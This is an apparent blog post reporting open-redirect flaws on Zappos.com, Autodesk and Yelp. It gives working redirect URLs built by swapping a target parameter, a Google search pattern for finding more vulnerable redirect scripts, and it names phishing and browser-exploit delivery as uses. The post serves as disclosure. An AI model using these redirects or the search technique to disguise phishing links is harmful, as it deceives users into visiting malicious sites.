Zappos Redirect Exploit

So I saw this interesting link bait on my Facebook feed, but the source of it happened to be Zappos.com. I thought it could of been from a Zappos blog, since those guys happen to be pretty hip and could of shared it, however when I clicked the link it redirected me to a seemingly malicious site meant to spread more of this malicious page.

Now I decided to see if I could replicate this, just to make sure I wasn’t crazy.

http://www.zappos.com/bin/zapposset?src=google&ref=googk2zappos_731072p27&tgt=http%3A%2F%2Fmorselcode.com%2F&h=sAQCH4MaP

Turns out it was easy, you only need to replace the tgt parameter to any encoded URL and it will redirect you.

Now the value of this exploit about as equal to the value of the zappos.com TLD. If people trust that URL then you can easily convince them to click it. Sharing it on Facebook, Twitter or any other social network would be easy and make it look legit. Possible uses are for phishing or specifically phishing for Zappos.com info to just feed the browser an exploit and possibly compromise their machine.

EDIT: After getting an email from Joe Levy, he told me to do a Google search (inurl:“target=http”, and variants thereof) to find new URL’s that could be potentially exploitable and within a minute I found that Yelp.com and Autodesk also had easy to exploit redirect scripts.

http://usa.autodesk.com/adsk/servlet/oc/redir?siteID=123112&url=http%3A%2F%2Fmorselcode.com

http://www.yelp.com/redir?url=http%3A%2F%2Fwww.morselcode.com